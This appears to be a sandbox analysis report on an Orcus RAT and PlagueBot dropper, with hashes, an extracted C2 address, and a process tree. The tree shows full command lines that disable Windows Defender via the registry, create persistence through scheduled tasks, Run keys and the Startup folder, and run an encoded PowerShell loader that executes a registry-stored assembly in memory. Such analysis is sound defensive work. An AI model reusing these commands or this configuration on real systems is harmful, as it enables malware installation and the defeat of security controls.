Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
19-10-2022 06:11
Static task
static1
General
-
Target
57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe
-
Size
100KB
-
MD5
b7756f9d9e8c5f4ba2c930adb666fbae
-
SHA1
8ddb9f2a559f6af5ccaa04c8b5b589d216357340
-
SHA256
57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b
-
SHA512
c5c85c86251c34530b672de0feee38bd148cddd53beb7191a250f09e6d504460c343a0f608e2002434e4b98585e61222f44bc159bfb2a340c0e73a3941bef67f
-
SSDEEP
1536:DQIAibOVOk3udovOyePC9Eop2h90L64QG9iDCzPgQD8Kg90a//MudDBG:DQ/ibOcIudovOy8CUwIOkCzgQq0UzxM
Malware Config
Extracted
orcus
146.70.143.176:81
712d31c7a3f54904a08d968a15b836e9
-
autostart_method
Registry
-
enable_keylogger
false
-
install_path
%programfiles%\orc\orc.exe
-
reconnect_delay
10000
-
registry_keyname
orc
-
taskscheduler_taskname
orc
-
watchdog_path
AppData\Watchdog.exe
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\WinDefend\Start = "4" 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe -
Orcus main payload 5 IoCs
resource yara_rule behavioral1/files/0x0003000000000735-148.dat family_orcus behavioral1/files/0x0003000000000735-149.dat family_orcus behavioral1/files/0x000a000000022e32-181.dat family_orcus behavioral1/files/0x000a000000022e32-183.dat family_orcus behavioral1/files/0x000a000000022e32-195.dat family_orcus -
Orcurs Rat Executable 6 IoCs
resource yara_rule behavioral1/files/0x0003000000000735-148.dat orcus behavioral1/files/0x0003000000000735-149.dat orcus behavioral1/files/0x000a000000022e32-181.dat orcus behavioral1/files/0x000a000000022e32-183.dat orcus behavioral1/memory/3960-184-0x0000000000150000-0x000000000023A000-memory.dmp orcus behavioral1/files/0x000a000000022e32-195.dat orcus -
PlagueBot Executable 7 IoCs
resource yara_rule behavioral1/files/0x00070000000162a7-152.dat plaguebot behavioral1/files/0x00070000000162a7-153.dat plaguebot behavioral1/files/0x000300000001e499-165.dat plaguebot behavioral1/files/0x000300000001e499-166.dat plaguebot behavioral1/files/0x000300000001e499-203.dat plaguebot behavioral1/files/0x000300000001e499-211.dat plaguebot behavioral1/files/0x000300000001e499-212.dat plaguebot -
Blocklisted process makes network request 7 IoCs
flow pid Process 20 3148 powershell.exe 31 3148 powershell.exe 38 3148 powershell.exe 45 3148 powershell.exe 48 3148 powershell.exe 51 3148 powershell.exe 53 3148 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 2736 FILE.exe 4584 orc.exe 4652 plage.exe 804 winmgr.exe 4592 WindowsInput.exe 3608 WindowsInput.exe 3960 orc.exe 640 Watchdog.exe 1556 orc.exe 2848 Watchdog.exe 4216 winmgr.exe 3060 DefaultDomain 3652 winmgr.exe 4244 winmgr.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation plage.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation orc.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation orc.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Watchdog.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation FILE.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "4" 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\orc = "\"C:\\Program Files\\orc\\orc.exe\"" orc.exe -
Drops desktop.ini file(s) 2 IoCs
description ioc Process File created C:\Windows\assembly\Desktop.ini orc.exe File opened for modification C:\Windows\assembly\Desktop.ini orc.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\WindowsInput.exe orc.exe File created C:\Windows\SysWOW64\WindowsInput.exe.config orc.exe File created C:\Windows\SysWOW64\WindowsInput.InstallState WindowsInput.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\orc\orc.exe orc.exe File opened for modification C:\Program Files\orc\orc.exe orc.exe File created C:\Program Files\orc\orc.exe.config orc.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\assembly orc.exe File created C:\Windows\assembly\Desktop.ini orc.exe File opened for modification C:\Windows\assembly\Desktop.ini orc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2660 schtasks.exe 4164 schtasks.exe 1944 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4924 powershell.exe 4924 powershell.exe 4164 powershell.exe 4164 powershell.exe 2544 powershell.exe 3148 powershell.exe 2544 powershell.exe 3148 powershell.exe 3960 orc.exe 3960 orc.exe 2848 Watchdog.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3060 DefaultDomain 3060 DefaultDomain 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe 3960 orc.exe 2848 Watchdog.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe Token: SeRestorePrivilege 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe Token: SeSecurityPrivilege 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe Token: SeDebugPrivilege 4924 powershell.exe Token: SeDebugPrivilege 4164 powershell.exe Token: SeDebugPrivilege 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeDebugPrivilege 3148 powershell.exe Token: SeDebugPrivilege 640 Watchdog.exe Token: SeDebugPrivilege 2848 Watchdog.exe Token: SeDebugPrivilege 3960 orc.exe Token: SeDebugPrivilege 3060 DefaultDomain -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3148 powershell.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 2172 wrote to memory of 4924 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe 84 PID 2172 wrote to memory of 4924 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe 84 PID 2172 wrote to memory of 1944 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe 86 PID 2172 wrote to memory of 1944 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe 86 PID 2172 wrote to memory of 4164 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe 87 PID 2172 wrote to memory of 4164 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe 87 PID 2172 wrote to memory of 2736 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe 93 PID 2172 wrote to memory of 2736 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe 93 PID 2172 wrote to memory of 2736 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe 93 PID 2172 wrote to memory of 3340 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe 94 PID 2172 wrote to memory of 3340 2172 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe 94 PID 2736 wrote to memory of 4584 2736 FILE.exe 96 PID 2736 wrote to memory of 4584 2736 FILE.exe 96 PID 2736 wrote to memory of 4652 2736 FILE.exe 99 PID 2736 wrote to memory of 4652 2736 FILE.exe 99 PID 2736 wrote to memory of 4652 2736 FILE.exe 99 PID 4652 wrote to memory of 2660 4652 plage.exe 100 PID 4652 wrote to memory of 2660 4652 plage.exe 100 PID 4652 wrote to memory of 2660 4652 plage.exe 100 PID 4584 wrote to memory of 4508 4584 orc.exe 102 PID 4584 wrote to memory of 4508 4584 orc.exe 102 PID 4652 wrote to memory of 4760 4652 plage.exe 104 PID 4652 wrote to memory of 4760 4652 plage.exe 104 PID 4652 wrote to memory of 4760 4652 plage.exe 104 PID 4508 wrote to memory of 436 4508 csc.exe 106 PID 4508 wrote to memory of 436 4508 csc.exe 106 PID 4652 wrote to memory of 804 4652 plage.exe 107 PID 4652 wrote to memory of 804 4652 plage.exe 107 PID 4652 wrote to memory of 804 4652 plage.exe 107 PID 4584 wrote to memory of 4592 4584 orc.exe 108 PID 4584 wrote to memory of 4592 4584 orc.exe 108 PID 3340 wrote to memory of 2544 3340 WScript.exe 110 PID 3340 wrote to memory of 2544 3340 WScript.exe 110 PID 3340 wrote to memory of 3148 3340 WScript.exe 114 PID 3340 wrote to memory of 3148 3340 WScript.exe 114 PID 4584 wrote to memory of 3960 4584 orc.exe 112 PID 4584 wrote to memory of 3960 4584 orc.exe 112 PID 3960 wrote to memory of 640 3960 orc.exe 116 PID 3960 wrote to memory of 640 3960 orc.exe 116 PID 3960 wrote to memory of 640 3960 orc.exe 116 PID 3148 wrote to memory of 4164 3148 powershell.exe 118 PID 3148 wrote to memory of 4164 3148 powershell.exe 118 PID 640 wrote to memory of 2848 640 Watchdog.exe 117 PID 640 wrote to memory of 2848 640 Watchdog.exe 117 PID 640 wrote to memory of 2848 640 Watchdog.exe 117
Processes
-
C:\Users\Admin\AppData\Local\Temp\57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe"C:\Users\Admin\AppData\Local\Temp\57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Windows security modification
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b.exe" /rl HIGHEST /f2⤵
- Creates scheduled task(s)
PID:1944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4164
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\FILE.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\FILE.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\orc.exe"C:\Users\Admin\AppData\Local\Temp\orc.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f0uqbs3k.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA195.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA194.tmp"5⤵PID:436
-
-
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe" --install4⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4592
-
-
C:\Program Files\orc\orc.exe"C:\Program Files\orc\orc.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Users\Admin\AppData\Roaming\Watchdog.exe"C:\Users\Admin\AppData\Roaming\Watchdog.exe" /launchSelfAndExit "C:\Program Files\orc\orc.exe" 3960 /protectFile5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Users\Admin\AppData\Roaming\Watchdog.exe"C:\Users\Admin\AppData\Roaming\Watchdog.exe" /watchProcess "C:\Program Files\orc\orc.exe" 3960 "/protectFile"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
-
-
-
C:\Users\Admin\Downloads\plage.exe"C:\Users\Admin\Downloads\plage.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /TN "WinManager" /XML "C:\Users\Admin\AppData\Local\Temp\NewTask.xml"4⤵
- Creates scheduled task(s)
PID:2660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Query /FO "LIST" /TN "WinManager"4⤵PID:4760
-
-
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe"C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe" /wait4⤵
- Executes dropped EXE
PID:804
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp8F25.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -window 1 Copy-Item 'C:\Users\Admin\AppData\Local\Temp\tmp8F25.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nitro64.vbs';3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABuAGkAdAByAG8ANgA0AFwAKQAuAG4AaQB0AHIAbwA2ADQAKQA7ACAAJAB0AGUAeAB0ACAAPQAgAC0AagBvAGkAbgAgACQAdABlAHgAdABbAC0AMQAuAC4ALQAkAHQAZQB4AHQALgBMAGUAbgBnAHQAaABdADsAIABbAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAZQB4AHQAKQApAC4ARQBuAHQAcgB5AFAAbwBpAG4AdAAuAEkAbgB2AG8AawBlACgAJABOAHUAbABsACwAJABOAHUAbABsACkAOwA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nitro64" /tr "C:\Users\Admin\AppData\Local\DefaultDomain"4⤵
- Creates scheduled task(s)
PID:4164
-
-
-
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe"1⤵
- Executes dropped EXE
PID:3608
-
C:\Program Files\orc\orc.exe"C:\Program Files\orc\orc.exe"1⤵
- Executes dropped EXE
PID:1556
-
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exeC:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe1⤵
- Executes dropped EXE
PID:4216
-
C:\Users\Admin\AppData\Local\DefaultDomainC:\Users\Admin\AppData\Local\DefaultDomain1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exeC:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe1⤵
- Executes dropped EXE
PID:3652
-
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exeC:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe1⤵
- Executes dropped EXE
PID:4244
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
916KB
MD5ac0431f34683bcbbb2cf23aaf29ea8cf
SHA1275ec0e362cb074d5f080aaa41c25a8ecebe3205
SHA2561780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb
SHA512156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c
-
Filesize
916KB
MD5ac0431f34683bcbbb2cf23aaf29ea8cf
SHA1275ec0e362cb074d5f080aaa41c25a8ecebe3205
SHA2561780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb
SHA512156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c
-
Filesize
916KB
MD5ac0431f34683bcbbb2cf23aaf29ea8cf
SHA1275ec0e362cb074d5f080aaa41c25a8ecebe3205
SHA2561780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb
SHA512156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c
-
Filesize
357B
MD5a2b76cea3a59fa9af5ea21ff68139c98
SHA135d76475e6a54c168f536e30206578babff58274
SHA256f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839
SHA512b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
Filesize
1KB
MD58efaecee35e41252bfef883749ad0da2
SHA1e6a374735d5f098346e039681ca04f3f09f04308
SHA256adaafb2f2714829e021f97ab30acc442970b8665dece9cbbef04efae83e8df46
SHA5120bc15465df92041b66c34874bcdfaa5d15df828f389f1ea44b476db4dc54df462b6e1bd0df3920ec44cc623d5d75101dd0846474d473e71716791ebd82c5a73c
-
Filesize
1KB
MD5dcf0e0fcb124f5422d50a83864d43f6d
SHA12f8fb0aaa001cee674e7e7d8c1d10a4ac2952e62
SHA25607a7cadd334d713435bd996f7d0b52b71362baea3a1f17b8e3a800081a974345
SHA512003c646d0f66ec7ca7b175abb734cac3ffa89b8582144aff7078b158ef5248d96f4fcb718ce402f84314482ee44126eee4a2cb3e9cb9013b1d42d81472c2f1b0
-
Filesize
76KB
MD573e071e2bc5ac185bf9c3e44ea4fb346
SHA155a37bc4ed482cc673faef39854eb35be933d266
SHA25642a5c18978fab7808c41aaf9fe43196a02e1cdcc2c7cc3afd9fc913e0825a0b9
SHA512c00a78ee12067d7de2c15a277d5a94a37c18884ad94f4d97648a890a5298dc23427130b5fb6c7205362267fc76c5adae8bf823840b8fc8ece3b1c577e58d1c6b
-
Filesize
916KB
MD5ac0431f34683bcbbb2cf23aaf29ea8cf
SHA1275ec0e362cb074d5f080aaa41c25a8ecebe3205
SHA2561780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb
SHA512156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c
-
Filesize
916KB
MD5ac0431f34683bcbbb2cf23aaf29ea8cf
SHA1275ec0e362cb074d5f080aaa41c25a8ecebe3205
SHA2561780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb
SHA512156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c
-
Filesize
74KB
MD50c2a7204dd6c378451e6ca6985802a22
SHA1a29982b623533bff6638053e27b9ed462196b82e
SHA256536be654e06c9e81282d106ecd7aab29ad273fdbd7bdc62a2acfe919060614d2
SHA51220273ddb38596ff9ac5cd3f1d057890cdb0a8b53b3a91bfb33d271c3dddaac8a4e9b5cb8dce634ad06a682c0f6c952a8b41c17ecb92b51e9d9dd39468ac6f5f8
-
Filesize
18KB
MD589ad448d079c97e6223bd48892a4c8b1
SHA1c864447470fe553ccbb0574f8596200c72283145
SHA2562ad50133104bbae5d82e85737296e39eecbfec15c270afd2a3b6aa981d53215f
SHA512ad594497d29d3eebddc6ca56bc9cd5ae64fd5c27fb1087634e198e846cdaa92fa60043ee64d9712b45d8833d7485c64f7bfab3a1cdbb3bee0c8d02125d47562c
-
Filesize
18KB
MD589ad448d079c97e6223bd48892a4c8b1
SHA1c864447470fe553ccbb0574f8596200c72283145
SHA2562ad50133104bbae5d82e85737296e39eecbfec15c270afd2a3b6aa981d53215f
SHA512ad594497d29d3eebddc6ca56bc9cd5ae64fd5c27fb1087634e198e846cdaa92fa60043ee64d9712b45d8833d7485c64f7bfab3a1cdbb3bee0c8d02125d47562c
-
Filesize
9KB
MD5913967b216326e36a08010fb70f9dba3
SHA17b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf
SHA2568d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a
SHA512c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33
-
Filesize
9KB
MD5913967b216326e36a08010fb70f9dba3
SHA17b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf
SHA2568d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a
SHA512c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33
-
Filesize
9KB
MD5913967b216326e36a08010fb70f9dba3
SHA17b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf
SHA2568d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a
SHA512c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33
-
Filesize
357B
MD5a2b76cea3a59fa9af5ea21ff68139c98
SHA135d76475e6a54c168f536e30206578babff58274
SHA256f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839
SHA512b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad
-
Filesize
967KB
MD5b63bb68654e7be72058398809d6c4754
SHA14a7b43488029a2d4c960c9ee4431b99c8640a4b0
SHA2568db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe
SHA512c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a
-
Filesize
967KB
